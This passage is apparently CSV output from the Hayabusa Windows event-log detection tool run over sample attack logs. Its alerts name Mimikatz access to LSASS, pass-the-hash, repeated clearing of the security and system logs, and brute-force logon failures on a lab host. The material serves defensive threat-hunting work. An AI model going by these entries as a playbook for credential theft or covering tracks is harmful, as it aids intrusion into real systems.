memory access.evtx +2021-10-22 05:40:43.136 +09:00,FS03.offsec.lan,10,high,Suspicious GrantedAccess Flags on LSASS Access,,rules/sigma/process_access/win_susp_proc_access_lsass.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1550-Use Alternate Authentication Material/ID10-Pass the hash Mimikatz memory access.evtx +2021-10-22 05:40:43.136 +09:00,FS03.offsec.lan,10,high,Mimikatz Detection LSASS 
Access,,rules/sigma/deprecated/sysmon_mimikatz_detection_lsass.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1550-Use Alternate Authentication Material/ID10-Pass the hash Mimikatz memory access.evtx +2021-10-22 05:40:43.136 +09:00,FS03.offsec.lan,10,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1550-Use Alternate Authentication Material/ID10-Pass the hash Mimikatz memory access.evtx +2021-10-22 05:40:43.136 +09:00,FS03.offsec.lan,10,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1550-Use Alternate Authentication Material/ID10-Pass the hash Mimikatz memory access.evtx +2021-10-22 22:39:49.619 +09:00,FS03.offsec.lan,1102,high,Security log was cleared,User: admmig,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID4688-Firewall configuration enumerated (command).evtx +2021-10-22 23:02:11.218 +09:00,FS03.offsec.lan,1102,high,Security log was cleared,User: admmig,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID4688-Scheduled task configuration enumeration.evtx +2021-10-22 23:02:15.177 +09:00,FS03.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Sysmon\desktop.ini : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID4688-Scheduled task configuration enumeration.evtx 
+2021-10-24 06:50:11.666 +09:00,FS03.offsec.lan,4625,low,Logon Failure - Unknown Reason,User: - : Type: 10 : Workstation: - : IP Address: 10.23.23.9 : SubStatus: 0x0 : AuthPackage: Negotiate,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-UnknownError.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0001-Initial access/T1078-Valid accounts/ID4625-brutfoce with denied access due to account restriction.evtx +2021-10-24 06:51:57.212 +09:00,FS03.offsec.lan,4625,low,Logon Failure - Unknown Reason,User: - : Type: 10 : Workstation: - : IP Address: 10.23.23.9 : SubStatus: 0x0 : AuthPackage: Negotiate,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-UnknownError.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0001-Initial access/T1078-Valid accounts/ID4625-brutfoce with denied access due to account restriction.evtx +2021-10-26 03:04:30.334 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:09:51.875 +09:00,FS03.offsec.lan,1102,high,Security log was cleared,User: admmig,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:09.002 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:09.080 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: 
admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:09.095 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:09.127 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:09.142 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:09.215 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:09.293 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:09.340 
+09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:09.355 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:09.418 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:09.480 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:09.527 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:09.574 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event 
logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:09.591 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:09.606 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:09.638 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:09.653 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:09.669 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:09.747 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: 
admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:09.778 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:09.794 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:09.841 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:09.856 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:09.888 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:09.903 
+09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:09.950 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:09.997 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:10.028 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:10.044 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:10.059 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event 
logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:10.075 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:10.106 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:10.138 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:10.184 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:10.200 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:10.216 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: 
admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:10.231 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:10.263 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:10.294 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:10.309 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:10.325 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:10.341 
+09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:10.356 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:10.403 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:10.419 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:10.434 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:10.450 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event 
logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:10.481 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:10.481 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:10.497 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:10.528 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:10.747 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:10.763 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: 
admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:10.778 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:10.794 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:10.809 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:10.856 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:10.934 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:10.997 
+09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:11.028 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:11.091 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:11.106 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:11.184 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:11.200 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event 
logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:11.216 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:11.247 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:11.341 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:11.388 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:11.403 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:11.450 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: 
